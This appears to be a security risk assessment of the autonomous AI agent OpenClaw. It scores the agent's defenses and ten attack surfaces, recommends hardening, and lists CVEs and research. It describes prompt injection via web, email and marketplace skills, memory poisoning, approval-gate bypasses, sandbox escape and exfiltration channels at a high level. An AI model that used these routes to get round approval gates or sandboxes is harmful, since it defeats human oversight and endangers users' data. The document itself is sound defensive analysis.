1 Risk Scores

Five headline metrics from the AIRQ methodology. The first two place the agent on the quadrant; the remaining three describe how much defense is actually in place.

Compromise Score9.2 / 10

Ability to Inflict Real Harm10.0 / 10

Total Defense Score0 / 15

Verified Defense (Isolation + Action Controls + Monitoring)0 / 9

Security-Adjusted Capability (SAC)3.52

Compromise Score: 9.2 / 10. Among the easiest agents in the set to compromise. Multiple well-documented attack paths, confirmed zero-click vectors, and several published CVEs.

Ability to Inflict Real Harm: 10 / 10. Maximum. Shell, network, credentials, file system, and autonomous action are all available, and nothing meaningfully contains the blast radius.

Total Defense Score: 0 / 15. No defensive controls across any of the five defense categories.

Verified Defense: 0 / 9. All three high-confidence defense categories are absent — a confirmed architectural state, not a research gap.

Security-Adjusted Capability: 3.52. OpenClaw's wide capability footprint cannot offset zero defense and very high compromise exposure, placing it near the bottom of the ranking.

2 Defense Components

Five MECE categories (Input → Processing → Action → Output → Detection) each scored 0–3. OpenClaw scores zero across all five.

Input Guardrails

—

Execution Isolation

—

Action Controls

—

Output Guardrails

—

Monitoring & Audit

—

Input Guardrails: 0 / 3. Nothing filters untrusted content before it reaches the agent. Any webpage, email, chat message, or marketplace skill can deliver prompt injection straight into the reasoning loop.

Execution Isolation: 0 / 3. The agent runs in-process with user-level privileges, unrestricted network, and full file system access. No sandbox, container, or network allowlist is enabled by default.

Action Controls: 0 / 3. Tool calls execute without approval gates or permission model. The agent can send, publish, deploy, or purchase on the user's behalf with no interruption point.

Output Guardrails: 0 / 3. Outputs flow through markdown, image, and URL rendering unchecked, leaving every documented exfiltration channel open.

Monitoring & Audit: 0 / 3. No structured logging, no audit trail, and no compliance certification. Incidents are effectively invisible until they produce visible second-order damage.

3 Attack Surface Exposure

Ten surfaces scored 0–4 each. Eight of ten score 3 or higher; six are at the architectural maximum.

Attack Surface Scores

User Input

External Data

Memory

Reasoning

Planning

Tool Execution

Orchestration

Inter-Agent

Output Processing

Configuration

User Input: 4 / 4. Direct prompt injection is trivially effective. No input validation, no separation between the user's intent and adversarial content.

External Data: 4 / 4. Ingests content from web pages, email, 20+ messaging platforms, local files, and the skills marketplace. Every channel is an attacker-controlled input path.

Memory: 4 / 4. Persistent cross-session memory with no integrity verification. One successful poisoning persists into every future conversation.

Reasoning: 2 / 4. Moderate exposure. Goal manipulation is a theoretical risk, but adversaries rarely need to attack the reasoning layer when the input channel itself is open.

Planning: 2 / 4. Task decomposition is exploitable, but damaging outcomes arrive through tool execution before planning subtleties matter.

Tool Execution: 4 / 4. Full shell, code execution, API calls, and credential access within scope. The surface that converts any compromise into concrete harm.

Orchestration: 4 / 4. Autonomous multi-step chains with no interruption points — compromise at any step propagates unimpeded.

Inter-Agent: 3 / 4. Weak trust model between cooperating agents creates meaningful cascade risk, though it is not the lead attack vector today.

Output Processing: 4 / 4. Markdown, image URLs, and unsanitized redirects give attackers several exfiltration channels for sensitive context.

Configuration: 4 / 4. The plugin and skills supply chain is the most mature attack path — 820+ malicious skills have already been documented in the marketplace.

4 Detailed Assessment

Agent properties mapped against best-in-class reference agents from the same cohort.

Dimension	OpenClaw	Best-in-class reference
Untrusted input surfaces	Web, email, messages, files, 20+ messaging platforms, browser, shell, marketplace skills	Code-completion tools with no web or messaging ingress
Tool capabilities	Full shell, browser, file system, 20+ messaging platforms, email, 24/7 daemon, marketplace skills	Scoped tool access with explicit capability declarations
Human-in-the-loop	None; fully autonomous 24/7 daemon	Claude Code: 3-level permission model with deny accumulation
Sandboxing & isolation	None; 30K+ exposed instances; no network isolation; no file scoping; no credential management	Claude Code: Seatbelt + Bubblewrap + domain allowlist. Codex CLI: Landlock + network blocked.
Known CVEs & incidents	10+ CVEs; 820 malicious marketplace skills; mass exploitation documented; zero-click vectors confirmed	Cohort agents with zero published CVEs and independent adversarial testing
Compliance posture	None	Ada AI (AIUC-1, SOC 2); Moveworks (FedRAMP); Augment Code (SOC 2, ISO 42001)

Key Risk

Fully exposed autonomous agent with zero controls; mass exploitation actively occurring.

Lethal Trifecta

Yes — all three

The Lethal Trifecta (Simon Willison) applies when an agent combines exposure to untrusted input, access to sensitive data, and the ability to communicate externally. OpenClaw meets all three conditions: ingests untrusted content from web, email, and marketplace skills; accesses user files, credentials, and messaging platforms; and can send outbound traffic without restriction.

5 Hardening Recommendations

If OpenClaw is deployed in an enterprise environment, these controls map to the five defense components. None restores the agent to acceptable risk; they reduce blast radius.

Input (Input Guardrails)

Disable the skills marketplace entirely; allowlist only internally audited skills. Treats the 820+ documented malicious skills as the baseline threat model rather than an edge case.
Strip or quarantine HTML, markdown, and embedded content from any ingested email, chat message, or web page before it reaches the agent context.

Isolation (Execution Isolation)

Run OpenClaw inside a rootless container or Bubblewrap sandbox with network blocked by default and an explicit domain allowlist.
Scope file system access to a dedicated working directory; remove access to home directory, credential stores, and SSH keys.
Run under a dedicated OS user with no sudo rights and no access to user credentials, tokens, or browser profiles.

Action (Action Controls)

Introduce an approval-gate proxy for any tool call matching shell execution, file write outside the working directory, or outbound network to a non-allowlisted domain.

Output (Output Guardrails)

Disable markdown image rendering and URL auto-fetch in any interface consuming OpenClaw output. Closes the primary documented exfiltration channels.

Detection (Monitoring & Audit)

Log all tool calls, shell commands, and outbound network connections; alert on the known indicators of compromise from the 10+ published CVEs and the ClawHavoc malicious-skill set.

Even with all of the above in place, OpenClaw's base architecture (persistent memory without integrity verification, unrestricted orchestration chains) keeps it in the upper half of the compromise-score range. For environments with sensitive data, the recommendation remains non-deployment.

6 Threat Intelligence

Published vulnerabilities, security research, and active exploitation evidence informing the compromise and defense scores above.

CVEs and Advisories

CVE-2026-25253 — ClawBleed RCE (CVSS 8.8). Remote code execution via crafted skill manifest. An attacker-controlled skill can execute arbitrary code on the host system during installation.
CVE-2026-32922 — Privilege Escalation (CVSS 9.9). Local escalation to root via daemon misconfiguration. The 24/7 daemon process runs with insufficient privilege separation, allowing a compromised agent to gain root access.
CVE-2026-29607 / CVE-2026-28460 — Approval Bypass. Tool-call approval checks are bypassed under specific plugin states. Agents can execute privileged actions without triggering the intended confirmation gates.
CVE-2026-26322 — Server-Side Request Forgery (CVSS 7.6). SSRF via browser-tool URL handling. The agent's browser module can be directed to make requests to internal network resources.
CVE-2026-34426 — Approval Bypass via Environment Variables. Approval gates are bypassed when specific environment variables are set, enabling silent execution of restricted tool calls.
jgamblin/OpenClawCVEs — community-maintained CVE tracker cataloguing 156 advisories to date.

Published Research

The Hacker News — OpenClaw bug enables one-click remote exploitation. Walkthrough of the zero-click attack chain from crafted webpage to full shell access.
Kaspersky — OpenClaw vulnerabilities exposed. Analysis of the agent's attack surface from an endpoint-security perspective.
CrowdStrike — What security teams need to know about the OpenClaw AI super-agent. Enterprise threat assessment and detection guidance.
Cisco — Personal AI agents like OpenClaw are a security nightmare. Network-level risks when autonomous agents operate on corporate infrastructure.
Snyk — ToxicSkills: malicious AI agent skills on ClawHub. Supply-chain analysis of 820+ malicious skills in the public marketplace.
Oasis Security — ClawJacked research on session hijacking. Demonstrates how an attacker can take over active agent sessions through crafted inter-agent messages.
Wiz / ARMO — Analysis of sandbox escape via sessions_spawn. Documents how the agent's session management API can be exploited to break out of any applied container isolation.
ClawHavoc — 341+ documented malicious skills in the public marketplace. The most comprehensive catalogue of supply-chain attacks targeting the OpenClaw ecosystem.